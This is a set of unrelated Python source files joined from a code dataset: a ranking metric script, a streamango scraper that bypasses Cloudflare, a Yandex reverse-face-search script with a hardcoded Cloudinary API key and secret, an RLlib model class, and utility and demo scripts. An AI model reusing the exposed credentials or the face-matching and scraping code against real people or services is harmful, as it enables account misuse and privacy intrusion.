str(Decimal(int(j) / 3).quantize(Decimal('0.00'))) + '\\n')\n if len(c) > 5:\n j = top1(5)\n f.write('top5' + ' = ' + str(Decimal(int(j) / 5).quantize(Decimal('0.00'))) + '\\n')\n if len(c) > 10:\n j = top1(10)\n f.write('top10' + ' = ' + str(Decimal(int(j) / 10).quantize(Decimal('0.00'))) + '\\n')\n if len(c) > 15:\n j = top1(15)\n f.write('top15' + ' = ' + str(Decimal(int(j) / 15).quantize(Decimal('0.00'))) + '\\n')\n if len(c) > 25:\n j = top1(25)\n f.write('top25' + ' = ' + str(Decimal(int(j) / 25).quantize(Decimal('0.00'))) + '\\n')\n f.write('非常合适和合适占全部产品经理比例' + '\\n')\n j = top3(3)\n f.write('top3' + ' = ' + str(Decimal(int(j) / 3).quantize(Decimal('0.00'))) + '\\n')\n j = top3(5)\n f.write('top5' + ' = ' + str(Decimal(int(j) / 5).quantize(Decimal('0.00'))) + '\\n')\n if len(d) > 10:\n j = top3(10)\n f.write('top10' + ' = ' + str(Decimal(int(j) / 10).quantize(Decimal('0.00'))) + '\\n')\n if len(d) > 15:\n j = top3(15)\n f.write('top15' + ' = ' + str(Decimal(int(j) / 15).quantize(Decimal('0.00'))) + '\\n')\n if len(d) > 25:\n j = top3(25)\n f.write('top25' + ' = ' + str(Decimal(int(j) / 25).quantize(Decimal('0.00'))) + '\\n')\n f.write('mix'+'\\n')\n for i in range(len(data2)):\n data2[i][1] = str(data2[i][1])\n for i in range(len(data2)):\n f.write(' '.join(data2[i])+'\\n')\n j = top2(3)\n f.write('top3' + ' = ' + str(Decimal(int(j)/3).quantize(Decimal('0.00'))) + '\\n')\n j = top2(5)\n f.write('top5' + ' = ' + str(Decimal(int(j)/5).quantize(Decimal('0.00'))) + '\\n')\n j = top2(10)\n f.write('top10' + ' = ' + str(Decimal(int(j)/10).quantize(Decimal('0.00'))) + '\\n')\n if len(data2) > 15:\n j = top2(15)\n f.write('top15' + ' = ' + str(Decimal(int(j)/15).quantize(Decimal('0.00'))) + '\\n')\n if len(data2) > 25:\n j = top2(25)\n f.write('top25' + ' = ' + str(Decimal(int(j)/25).quantize(Decimal('0.00'))) + '\\n')\n if len(data2) > 50:\n j = top2(50)\n f.write('top50' + ' = ' + str(Decimal(int(j)/25).quantize(Decimal('0.00'))) + '\\n')\n\n\n\n\n\n","sub_path":"Ranking_1/paixu/case/chanpin.py","file_name":"chanpin.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"312441380","text":"import re\nimport execjs\nimport cfscrape\nimport subprocess\nfrom pyquery import PyQuery as pq\nfrom .utils import exceptions, casper, scrapertools\n\nscraper = cfscrape.create_scraper()\n\nclass streamango_IE:\n def __init__(self):\n self.regexes = [r\"^(?:https?://)?(?:www\\.)?(streamango\\.[a-z]+)\\/(?:f|embed)\\/([A-Za-z0-9]{10,})\"]\n self.aggregate = False\n \n def rewrite(self, url, find):\n for r in self.regexes:\n obj = re.match(r, url)\n if obj:\n return \"%s/f/%s\" % (find.best(obj.group(1)), obj.group(2))\n \n raise exceptions.RewriteError()\n \n \n def supports(self, url):\n for r in self.regexes:\n if re.match(r, url):\n return True\n \n return False\n \n \n def get(self, url, headers, bestOnly=True):\n \n data = scraper.get(url, headers=headers).content.decode('utf-8')\n \n video_urls = []\n \n matches = scrapertools.find_multiple_matches(\n data,\n \"type:\\\"video/([^\\\"]+)\\\",src:d\\('([^']+)',(.*?)\\).+?height:(\\d+)\")\n \n for ext, encoded, code, quality in matches:\n media_url = self.decode(encoded, int(code))\n \n while media_url[-1] == '@':\n media_url = media_url[:-1]\n \n if not media_url.startswith(\"http\"):\n media_url = \"http:\" + media_url\n video_urls.append(media_url)\n \n if bestOnly:\n return [video_urls[0]]\n else:\n return video_urls\n\n\n def decode(self, encoded, code):\n \n _0x59b81a = \"\"\n k = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='\n k = k[::-1]\n \n count = 0\n while count < len(encoded):\n _0x4a2f3a = k.index(encoded[count])\n count += 1\n _0x29d5bf = k.index(encoded[count])\n count += 1\n _0x3b6833 = k.index(encoded[count])\n count += 1\n _0x426d70 = k.index(encoded[count])\n count += 1\n \n _0x2e4782 = ((_0x4a2f3a << 2) | (_0x29d5bf >> 4))\n _0x2c0540 = (((_0x29d5bf & 15) << 4) | (_0x3b6833 >> 2))\n _0x5a46ef = ((_0x3b6833 & 3) << 6) | _0x426d70\n _0x2e4782 = _0x2e4782 ^ code\n \n _0x59b81a = str(_0x59b81a) + chr(_0x2e4782)\n \n if _0x3b6833 != 64:\n _0x59b81a = str(_0x59b81a) + chr(_0x2c0540)\n if _0x3b6833 != 64:\n _0x59b81a = str(_0x59b81a) + chr(_0x5a46ef)\n \n return _0x59b81a\n \n \n def test(self):\n return [\n {\n 'url': 'https://streamango.com/f/oeqdlsfnmfdrosts',\n 'md5': '6979519b6e0db1a711534dabfa2d83f6'\n },{\n 'url': 'https://streamango.com/f/brksptcotmdqbesk',\n 'md5': 'b6395b071fd9fb521addae65f5018a3e'\n },{\n 'url': 'https://streamango.com/f/tepsbbepqlapeotl',\n 'md5': '355174b0adabacd21628092903698a60'\n },{\n 'url': 'https://streamango.com/f/omftlnfnklrdttpq',\n 'md5': '97697ab876dc811471afd9123fe1fd04'\n },{\n 'url': 'https://streamango.com/f/ctadtblaqknqctdk',\n 'md5': '9323f9866cf7e39ea887b36f762595e8'\n }]","sub_path":"extractors/streamango_strm.py","file_name":"streamango_strm.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494751487","text":"\"\"\"ContactTag resource for ActiveCampaign\"\"\"\n\nimport typing\nfrom ..base_resource import Resource\n\n\nclass ContactTag(Resource):\n \"\"\"\n Tag for a contact in ActiveCampaign. Allows to:\n - Add a tag to contact\n - Remove a tag from a contact.\n\n Check docs in:\n https://developers.activecampaign.com/reference#contact-tags\n \"\"\"\n\n def __init__(\n self,\n tag: typing.Optional[int],\n contact: typing.Optional[int],\n **kwargs: typing.Dict,\n ) -> None:\n \"\"\"Initialize the contact tag.\n\n Args:\n tag: The id of the tag.\n contact: The id of the contact.\n \"\"\"\n super().__init__(**kwargs)\n self.tag = tag\n self.contact = contact\n\n @staticmethod\n def resource_name() -> str:\n \"\"\"Get the name of the API resource.\n\n Returns:\n The name of the resource\n \"\"\"\n return \"contactTags\"\n\n @staticmethod\n def map_field_name_to_attribute() -> typing.Dict:\n \"\"\"Map field names to attributes.\"\"\"\n return {\n \"tag\": \"tag\",\n \"contact\": \"contact\",\n }\n\n @classmethod\n def all_in_contact(cls, contact_id: int):\n \"\"\"Get all ContactTags associated to contact with that id\"\"\"\n for contact_tag in cls.get_all_in(\"contacts\", contact_id):\n yield contact_tag\n","sub_path":"active_campaign_api/resources/contact_tag.py","file_name":"contact_tag.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"574329185","text":"import re\nimport jieba\ndef clean_symbols(text):\n \"\"\"\n 对特殊符号做一些处理,此部分已写好。如果不满意也可以自行改写,不记录分数。\n \"\"\"\n text = re.sub('[!!]+', \"!\", text)\n text = re.sub('[??]+', \"?\", text)\n text = re.sub(\"[a-zA-Z#$%&\\'()*+,-./:;:<=>@,。★、…【】《》“”‘’[\\\\]^_`{|}~]+\", \" OOV \", text)\n # change all digital number into ' NUM '\n text = re.sub('\\d+(\\.\\d+)*', ' NUM ', text)\n return re.sub(\"\\s+\", \" \", text) \n\nss = 'adafasw12314.12333egrdf5236qew'\nnum = re.findall('\\d+',ss)\nprint(num)\n\nss = re.sub('\\d+(\\.\\d+)*', ' NUM ', ss)\nprint(ss)\n\ntext = '请问这机不是有个遥控器的吗?'\ntext = clean_symbols(text)\nprint(text)\n\ntokens = [x for x in jieba.cut(text, cut_all = False)]\nprint(tokens)\nsentence = [\" \".join(tokens)]\nprint(sentence)\n\ntext = \"\"\"我是一条天狗呀!\n 我把月来吞了,\n 我把日来吞了,\n 我把一切的星球来吞了,\n 我把全宇宙来吞了。\n 我便是我了!\"\"\"\nsentences = text.split()\nsent_words = [list(jieba.cut(sent0)) for sent0 in sentences]\ndocument = [\" \".join(sent0) for sent0 in sent_words]\nprint(document)\n\n","sub_path":"Chapter10/textProcessing.py","file_name":"textProcessing.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"336642755","text":"import abc\nfrom typing import Tuple, Union\n\nimport numpy as np\n\nfrom ray.rllib.core.models.base import (\n Model,\n ModelConfig,\n _raise_not_decorated_exception,\n)\nfrom ray.rllib.core.models.specs.checker import (\n is_input_decorated,\n is_output_decorated,\n check_input_specs,\n check_output_specs,\n)\nfrom ray.rllib.utils.annotations import override\nfrom ray.rllib.utils.framework import try_import_torch\nfrom ray.rllib.utils.nested_dict import NestedDict\nfrom ray.rllib.utils.typing import TensorType\n\ntorch, nn = try_import_torch()\n\n\nclass TorchModel(nn.Module, Model, abc.ABC):\n \"\"\"Base class for RLlib's PyTorch models.\n\n This class defines the interface for RLlib's PyTorch models and checks\n whether inputs and outputs of forward are checked with `check_input_specs()` and\n `check_output_specs()` respectively.\n\n Example usage for a single Flattening layer:\n\n .. testcode::\n\n from ray.rllib.core.models.torch.base import TorchModel\n from ray.rllib.core.models.base import ModelConfig\n import torch\n\n class FlattenModelConfig(ModelConfig):\n def build(self, framework: str):\n assert framework == \"torch\"\n return TorchFlattenModel(self)\n\n class TorchFlattenModel(TorchModel):\n def __init__(self, config):\n TorchModel.__init__(self, config)\n self.flatten_layer = torch.nn.Flatten()\n\n def _forward(self, inputs, **kwargs):\n return self.flatten_layer(inputs)\n\n model = FlattenModelConfig().build(\"torch\")\n inputs = torch.Tensor([[[1, 2]]])\n print(model(inputs))\n\n .. testoutput::\n\n tensor([[1., 2.]])\n\n \"\"\"\n\n def __init__(self, config: ModelConfig):\n \"\"\"Initialized a TorchModel.\n\n Args:\n config: The ModelConfig to use.\n \"\"\"\n nn.Module.__init__(self)\n Model.__init__(self, config)\n\n # Raise errors if forward method is not decorated to check specs.\n if not is_input_decorated(self.forward):\n _raise_not_decorated_exception(type(self).__name__ + \".forward()\", \"input\")\n if not is_output_decorated(self.forward):\n _raise_not_decorated_exception(type(self).__name__ + \".forward()\", \"output\")\n\n @check_input_specs(\"input_specs\")\n @check_output_specs(\"output_specs\")\n def forward(\n self, inputs: Union[NestedDict, TensorType], **kwargs\n ) -> Union[NestedDict, TensorType]:\n \"\"\"Returns the output of this model for the given input.\n\n This method only makes sure that we have a spec-checked _forward() method.\n\n Args:\n inputs: The input tensors.\n **kwargs: Forward compatibility kwargs.\n\n Returns:\n NestedDict: The output tensors.\n \"\"\"\n return self._forward(inputs, **kwargs)\n\n @override(Model)\n def get_num_parameters(self) -> Tuple[int, int]:\n num_all_params = sum(int(np.prod(p.size())) for p in self.parameters())\n trainable_params = filter(lambda p: p.requires_grad, self.parameters())\n num_trainable_params = sum(int(np.prod(p.size())) for p in trainable_params)\n return (\n num_trainable_params,\n num_all_params - num_trainable_params,\n )\n\n @override(Model)\n def _set_to_dummy_weights(self, value_sequence=(-0.02, -0.01, 0.01, 0.02)):\n trainable_weights = [p for p in self.parameters() if p.requires_grad]\n non_trainable_weights = [p for p in self.parameters() if not p.requires_grad]\n for i, w in enumerate(trainable_weights + non_trainable_weights):\n fill_val = value_sequence[i % len(value_sequence)]\n with torch.no_grad():\n w.fill_(fill_val)\n","sub_path":"rllib/core/models/torch/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"620468721","text":"import os\nimport re\nimport cv2\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import unquote\nimport cloudinary.uploader\nimport urllib.request\nimport numpy as np\n\n\nfilename = \"arapova.jpg\"\n\n\n\nglobal imgs\nimgs = []\n\nhi = 0\nwi = 0\nbb = 0\ncloudinary.config(\n cloud_name = 'dnevycmvy', \n api_key = '561873719248581', \n api_secret = '6WprD1-g9yjnZON65Eh9sqTz7so' \n)\n\ndef mouse_press(event, x, y, flags, param):\n if event == cv2.EVENT_LBUTTONDOWN:\n os.startfile(imgs[param])\n print(imgs[param])\n\narap = cloudinary.uploader.upload(filename)['secure_url']\n#arap = \"https://res.cloudinary.com/dnevycmvy/image/upload/v1622811323/fdq08sd5sord9qxdxrgz.jpg\" #del\nurl = r'https://yandex.ru/images/search?source=collections&rpt=imageview&url={}'.format(arap)\n\nsoup = BeautifulSoup(requests.get(url).text, 'lxml')\nsimilar = soup.find_all('li', class_='cbir-similar__thumb')\n\nfor i in similar:\n out = f\"https://yandex.ru{i.find('a').get('href')}\\n\"\n imgs.append(unquote(out))\n\n\nfor a in range(0, len(imgs)):\n\n r = re.search(r'(?<=&img_url\\=).*?(?=&rpt\\=)', imgs[a])[0]\n try:\n req = urllib.request.urlopen(r)\n arr = np.asarray(bytearray(req.read()), dtype=np.uint8)\n except Exception as e:\n print(e)\n n = cv2.imdecode(arr, -1)\n gray = cv2.cvtColor(n, cv2.COLOR_BGR2GRAY)\n face_cascade = cv2.CascadeClassifier('dev/haarcascade_frontalface_alt2.xml')\n faces = face_cascade.detectMultiScale(gray, 1.1, 4)\n\n for (x, y, w, h) in faces:\n try:\n faces = n[y:y + h + 90, x:x + w + 90]\n except Exception as e:\n print(str(e))\n \n \n cv2.namedWindow(str(a), cv2.WINDOW_NORMAL)\n cv2.resizeWindow(str(a), 300,300)\n cv2.setMouseCallback(str(a), mouse_press, a)\n try:\n \n if (bb+1) % 11 != 0:\n cv2.moveWindow(str(a), hi + (300 * bb),wi)\n cv2.imshow(str(a), faces)\n bb = bb + 1\n else:\n wi = wi + 330\n cv2.moveWindow(str(a), hi + (300 * 0),wi)\n cv2.imshow(str(a), faces)\n bb = 1\n except Exception as e:\n if (bb+1) % 11 != 0:\n cv2.moveWindow(str(a), hi + (300 * bb),wi)\n bb = bb + 1\n else:\n cv2.moveWindow(str(a), hi + (300 * 0),wi)\n bb = 1\n\n\nwhile(1):\n key = cv2.waitKey(20) & 0xFF\n if key == ord('\\r'):\n print(\"enter\")\n elif key == 32:\n print(\"space\")\n elif key == ord('\\t'):\n print(\"tab\")\n elif key == 27:\n break\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"38697162","text":"#from pymouse import PyMouse\nfrom time import sleep\n\nfrom AppKit import NSEvent\nfrom Quartz.CoreGraphics import CGEventCreateMouseEvent\nfrom Quartz.CoreGraphics import CGEventPost\nfrom Quartz.CoreGraphics import kCGEventMouseMoved\nfrom Quartz.CoreGraphics import kCGEventLeftMouseDown\nfrom Quartz.CoreGraphics import kCGEventLeftMouseDown\nfrom Quartz.CoreGraphics import kCGEventLeftMouseUp\nfrom Quartz.CoreGraphics import kCGMouseButtonLeft\nfrom Quartz.CoreGraphics import kCGHIDEventTap\nfrom Quartz.CoreGraphics import CGDisplayPixelsHigh\n\nfrom time import sleep\n#import os\nimport webbrowser\nimport subprocess\n\ndef mouseEvent(type, posx, posy):\n theEvent = CGEventCreateMouseEvent(\n None, \n type, \n (posx,posy), \n kCGMouseButtonLeft)\n CGEventPost(kCGHIDEventTap, theEvent)\n\ndef mousemove(posx,posy):\n mouseEvent(kCGEventMouseMoved, posx,posy);\n\ndef mouseclick():\n\t\tx,y = position()\n # uncomment this line if you want to force the mouse \n # to MOVE to the click location first (I found it was not necessary).\n #mouseEvent(kCGEventMouseMoved, posx,posy);\n\t\tmouseEvent(kCGEventLeftMouseDown, x,y);\n\t\tmouseEvent(kCGEventLeftMouseUp, x,y);\n\ndef position():\n loc = NSEvent.mouseLocation()\n return loc.x, CGDisplayPixelsHigh(0) - loc.y\n\n\nsleep_time = .00025\n\ndef sign(number):\n\tif number>0:\n\t\treturn 1\n\telif number == 0:\n\t\treturn 0\n\telse:\n\t\treturn -1\n\n#bresenham's line algorithm\ndef move_the_mouse(x1,y1):\n #m = PyMouse()\n\n x1 = int(x1)\n y1 = int(y1)\n\n pos = position()\n x0 = int(pos[0])\n y0=int(pos[1])\n\n if x1 == x0:\n \tif y1 > y0:\n \t\titerr = range(y0,y1)\n \telse:\n \t\titerr = reversed(range(y1,y0))\n \tfor y in iterr:\n \t\tmousemove(x0,y)\n \t\tsleep(sleep_time)\n\n else:\n\n\t error = 0\n\t deltax = float(x1 - x0)\n\t deltay = float(y1 - y0)\n\t slope = abs(deltay / deltax)\n\n\t cury = y0\n\n\t if x1 > x0:\n\t \titerr = range(x0,x1)\n\t else:\n\t \titerr = reversed(range(x1,x0))\n\n\t for x in iterr:\n\t \tmousemove(x,cury)\n\t \tsleep(sleep_time)\n\t \terror += slope\n\t \twhile error >= .5:\n\t \t\tmousemove(x,cury)\n\t \t\tsleep(sleep_time)\n\t \t\tcury += sign(y1-y0)\n\t \t\terror -= 1\n\nchange_space = '''\nosascript -e 'tell application \"System Events\" to key code 124 using control down'\n'''\ncommand_i = '''\nosascript -e 'tell application \"System Events\" to key code 34 using command down'\n'''\n\nsubprocess.call(change_space,shell=True)\n\nnum_photos = 221\n\nfor i in range(num_photos):\n\tsleep(1)\n\tsubprocess.call(command_i,shell=True)\n\tsleep(1.5)\n\tmove_the_mouse(715,38)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(1292,320)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(1387,708)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(459,316)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(670,180)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(1050,560)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(144,10)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(1376,241)\n\tmouseclick()","sub_path":"seniorphotograb.py","file_name":"seniorphotograb.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"350287001","text":"from path import Path\n\ndef check_dir(file_name):\n this = Path(\".\")\n print(this.abspath())\n if file_name not in this.files():\n myglob = this.glob(\"*/**/{}\".format(file_name))\n myfile = myglob[0]\n myfolder = myfile.parent\n myfolder.chdir()\n\nmytimers = {}\n\ndef mytimer(name, seconds, dt, first=True):\n global mytimers\n if name in mytimers.keys():\n if mytimers[name] < dt:\n mytimers[name] = dt + seconds\n return True\n else:\n return False\n else:\n mytimers[name] = dt + seconds\n if first:\n return True\n else:\n return False\n\ndef remove_timer(name):\n if name in mytimers.keys():\n mytimers.pop(name, None)\n\n\ndef tuple_add(t1, t2):\n return (t1[0] + t2[0], t1[1] + t2[1])\n\ndef tuple_sub(t1, t2):\n return (t1[0] - t2[0], t1[1] - t2[1])\n\ndef tuple_mult(t1, n):\n return (t1[0]*n, t1[1]*n)\n\ndef tuple_div(t1, n):\n return (t1[0]/n, t1[1]/n)\n\ndef extract_images(filename, out_folder, group_name=\"mapfile\"):\n from PIL import Image\n im = Image.open(filename)\n size = im.size\n b = 64\n x_size = int(size[0]/b)\n y_size = int(size[1]/b)\n num = 1\n for y in xrange(y_size):\n for x in xrange(x_size):\n l = x*b\n u = y*b\n r = l+b\n d = u+b\n a = im.crop((l,u,r,d))\n a.save(\"{}{}{}.png\".format(out_folder, group_name, num))\n num += 1\n\n\n\nif __name__ == \"__main__\":\n extract_images(\"./img/magecity_64p.png\", \"./tiles/sheet_images/\")\n","sub_path":"Games/Simple-RPG/myfuncs.py","file_name":"myfuncs.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"512656458","text":"from __future__ import division\nimport openpyxl\n\n# new workbook\nresultBook = openpyxl.Workbook()\ndest_filename = 'resultSet.xlsx'\nsheetResult = resultBook.active\nsheetResult.title = \"results\"\nsheetResult = resultBook.get_sheet_by_name(\"results\")\n\n# retrieve data set\nbook = openpyxl.load_workbook('dataset.xlsx')\n\nsheetNames = book.get_sheet_names()\ntoHeader = book.get_sheet_by_name(sheetNames[1])\n\n# creating header line\na = []\nfor row in toHeader['A2':'A11']:\n for cell in row:\n a.append(cell.value)\n# print a\nh = []\nfor row in toHeader['H1':'H14']:\n for cell in row:\n h.append(cell.value)\n# print h\n\nh_line = 1\nd_line = h_line + 1\nfor row in sheetResult['A' + str(h_line):'J' + str(h_line)]:\n index = 0\n for cell in row:\n cell.value = a[index]\n index = index + 1\n\nfor row in sheetResult['K' + str(h_line):'T' + str(h_line)]:\n index = 0\n for cell in row:\n cell.value = a[index] + '_angle'\n index = index + 1\n\nfor row in sheetResult['U' + str(h_line):'AC' + str(h_line)]:\n index = 1\n for cell in row:\n cell.value = a[index] + '_bala'\n index = index + 1\n\nfor row in sheetResult['AD' + str(h_line):'AQ' + str(h_line)]:\n index = 0\n for cell in row:\n cell.value = h[index]\n index = index + 1\n\n\n# data lines creation\nd_line = 2\nfor sheet in book.worksheets:\n a = []\n for row in sheet['A2':'A11']:\n for cell in row:\n a.append(cell.value)\n # print a\n b = []\n for row in sheet['B2':'B11']:\n for cell in row:\n b.append(cell.value)\n # print b\n c = []\n for row in sheet['C2':'C11']:\n for cell in row:\n c.append(cell.value)\n # print c\n d = []\n for row in sheet['D2':'D11']:\n for cell in row:\n d.append(cell.value)\n # print d\n e = []\n for row in sheet['E2':'E11']:\n for cell in row:\n e.append(cell.value)\n # print e\n f = []\n for row in sheet['F2':'F11']:\n for cell in row:\n f.append(cell.value)\n # print f\n h = []\n for row in sheet['H1':'H14']:\n for cell in row:\n h.append(cell.value)\n # print h\n i = []\n for row in sheet['I1':'I14']:\n for cell in row:\n i.append(cell.value)\n # print i\n\n # creating data line\n for row in sheetResult['A' + str(d_line):'J' + str(d_line)]:\n index = 0\n for cell in row:\n cell.value = b[index]\n index = index + 1\n\n for row in sheetResult['K' + str(d_line):'T' + str(d_line)]:\n index = 0\n for cell in row:\n cell.value = (c[index] * 60 + d[index]) / 60\n index = index + 1\n\n for row in sheetResult['U' + str(d_line):'AC' + str(d_line)]:\n index = 1\n for cell in row:\n cell.value = f[index]\n index = index + 1\n\n for row in sheetResult['AD' + str(d_line):'AQ' + str(d_line)]:\n index = 0\n for cell in row:\n cell.value = i[index]\n index = index + 1\n d_line = d_line + 1\n\nresultBook.save(dest_filename)\n# book.save('test.xlsx')\n\nprint(\"Completed: filename - \"+dest_filename)\n","sub_path":"src/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"529741508","text":"import Demo_pb2\n\nsensors_record = Demo_pb2.txRoadSensorsRecord()\nroadsensors = Demo_pb2.txRoadSensors()\nroadsensors.start_timestamp = 930\nroadsensors.end_timestamp = 1000\n\nsensor_1=roadsensors.sensor.add()\nsensor_1.flow=2222\nsensor_1=roadsensors.sensor.add()\nsensor_1.flow=2224\n\nsensors_record.sensors[1].CopyFrom(roadsensors) #实例roadsensors作为值\nsensors_record.sensors[2].CopyFrom(roadsensors)\nprint(sensors_record)\n\n\n\n\n# #序列化\n# serializeToString = sensors_record.SerializeToString()\n# print(serializeToString,type(serializeToString))\n\n\n# # 反序列化\n# sensors_record.ParseFromString(serializeToString)\n\n# for key in sensors_record.sensors:\n# print(key,sensors_record.sensors[key])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"308176048","text":"import random\n\n\ndef test_randrange():\n print('=== test_randrange ===')\n s = ''\n for i in range(100):\n s += '{} '.format(random.randrange(5))\n print(s)\n\n s = ''\n for i in range(100):\n s += '{} '.format(random.randrange(start=1, stop=3, step=1))\n print(s)\n\n\ndef test_sample():\n print('=== test_sample ===')\n l = range(1, 5)\n s = ''\n for i in range(100):\n s += '{} '.format(random.sample(l, 2))\n print(s)\n\n\ndef test_random():\n print('=== test_random ===')\n s = ''\n for i in range(100):\n s += '{} '.format(random.random())\n print(s)\n\n\ndef test_uniform():\n print('=== test_uniform ===')\n s = ''\n for i in range(100):\n s += '{} '.format(random.uniform(1.0, 1.2))\n print(s)\n\n\ndef test_randint():\n print('=== test_randint ===')\n s = ''\n for i in range(100):\n s += '{} '.format(random.randint(1, 4))\n print(s)\n\n\ndef main():\n random.seed(1) # test seed\n\n test_randrange()\n test_sample()\n test_random()\n test_uniform()\n test_randint()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"builtin_packages/random_sp/random_sp.py","file_name":"random_sp.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"515618584","text":"import pandas as pd\nfrom datetime import datetime, timedelta, date, time\n\nfrom Utils.logger import Logger\nfrom Utils.graph_builder import GraphBuilder\nfrom google_trends import GoogleTrends\n\nfrom Models.graph_line import GraphLine\n\nimport logging\nfrom pytrends.request import TrendReq\n\n\ndef main():\n\n now = datetime.now()\n execution_timestamp = now.strftime(\"%d-%m-%Y %H-%M\")\n\n logging.basicConfig(filename='google_trends ' + execution_timestamp + '.log', level=logging.INFO)\n logger = logging.getLogger(\"main\")\n\n pytrend = TrendReq(hl='en-US', tz=360)\n google_trends = GoogleTrends(pytrend, verbose=True)\n graph_builder = GraphBuilder()\n\n start = \"2017-01-01\" #\"2020-01-01\"\n end = \"2019-11-23\" #\"2021-05-01\"\n\n # Getting all keywords:\n # df = pd.read_csv('search_df.csv')\n\n d = {'ticker': [\"iPhone\"], 'keyword': [\"iPhone\"]}\n df = pd.DataFrame(data=d)\n\n # Processing every keyword separately\n for index, row in df.iterrows():\n\n ticker = row['ticker']\n keyword = row['keyword']\n\n logger.info(\"Processing Ticker: \" + ticker + \" Keyword: \" + keyword)\n overlapped_daily_data = google_trends.get_overlapped_daily_trend_data(keyword=keyword, start=start, end=end)\n original_daily_data = google_trends.get_original_daily_trend_data(keyword=keyword, start=start, end=end)\n logger.info(\"Finished processing...\")\n\n filename = ticker + \" \" + execution_timestamp + \".csv\"\n # daily_fetched_data.to_csv(filename)\n\n overlapped_daily_line = GraphLine(overlapped_daily_data[keyword], \"overlapped daily\")\n original_daily_line = GraphLine(original_daily_data[keyword], \"original daily\")\n overlap_line = GraphLine(overlapped_daily_data['overlap'], 'overlap')\n\n # Build chart - Way 1\n # overlapped_daily_data.plot()\n\n # Build chart - Way 2\n lines = [overlapped_daily_line, original_daily_line, overlap_line]\n graph_builder.build(lines, \"dates\", \"Relative Search Trends\", title=\"Daily Google Trends for keyword: \" + keyword + \" \" + start + \" \" + end)\n\n logger.info(\"Build graph for : \" + ticker + \" Keyword: \" + keyword)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"649861496","text":"import numpy as np\nfrom .. import differentiable_renderer_cython\nimport torch\nimport copy\nfrom ..differentiable_renderer import Scene3D\n\n\nclass TorchDifferentiableRenderer2DFunc(torch.autograd.Function):\n @staticmethod\n def forward(ctx, ij, colors, scene):\n nbColorChanels = colors.shape[1]\n Abuffer = np.empty((scene.image_H, scene.image_W, nbColorChanels))\n Zbuffer = np.empty((scene.image_H, scene.image_W))\n ctx.scene = scene\n scene.ij = (\n ij.detach().numpy()\n ) # should automatically detached according to https://pytorch.org/docs/master/notes/extending.html\n scene.colors = colors.detach().numpy()\n differentiable_renderer_cython.renderScene(scene, 1, Abuffer, Zbuffer)\n ctx.save_for_backward(ij, colors)\n ctx.Abuffer = (\n Abuffer.copy()\n ) # making a copy to keep the antializaed image for visualization , could be optional\n ctx.Zbuffer = Zbuffer\n return torch.as_tensor(Abuffer)\n\n @staticmethod\n def backward(ctx, Abuffer_b):\n scene = ctx.scene\n scene.uv_b = np.zeros(scene.uv.shape)\n scene.ij_b = np.zeros(scene.ij.shape)\n scene.shade_b = np.zeros(scene.shade.shape)\n scene.colors_b = np.zeros(scene.colors.shape)\n scene.texture_b = np.zeros(scene.texture.shape)\n differentiable_renderer_cython.renderSceneB(\n scene, 1, ctx.Abuffer, ctx.Zbuffer, Abuffer_b.numpy()\n )\n return torch.as_tensor(scene.ij_b), torch.as_tensor(scene.colors_b), None\n\n\nTorchDifferentiableRender2D = TorchDifferentiableRenderer2DFunc.apply\n\n\nclass Scene3DPytorch(Scene3D):\n def __init__(self):\n super().__init__()\n\n def setLight(self, ligthDirectional, ambiantLight):\n if not (isinstance(ligthDirectional, torch.Tensor)):\n ligthDirectional = torch.tensor(ligthDirectional)\n self.ligthDirectional = ligthDirectional\n self.ambiantLight = ambiantLight\n\n def _cameraProject(self, cameraMatrix, P3D):\n assert isinstance(P3D, torch.Tensor)\n r = torch.cat(\n (P3D, torch.ones((P3D.shape[0], 1), dtype=torch.double)), dim=1\n ).mm(torch.tensor(cameraMatrix.T))\n depths = r[:, 2]\n P2D = r[:, :2] / depths[:, None]\n return P2D, depths\n\n def _computeVerticesColorsWithIllumination(self):\n verticesLuminosity = (\n torch.relu(\n -torch.sum(self.mesh.vertexNormals * self.ligthDirectional, dim=1)\n )\n + self.ambiantLight\n )\n return self.mesh.verticesColors * 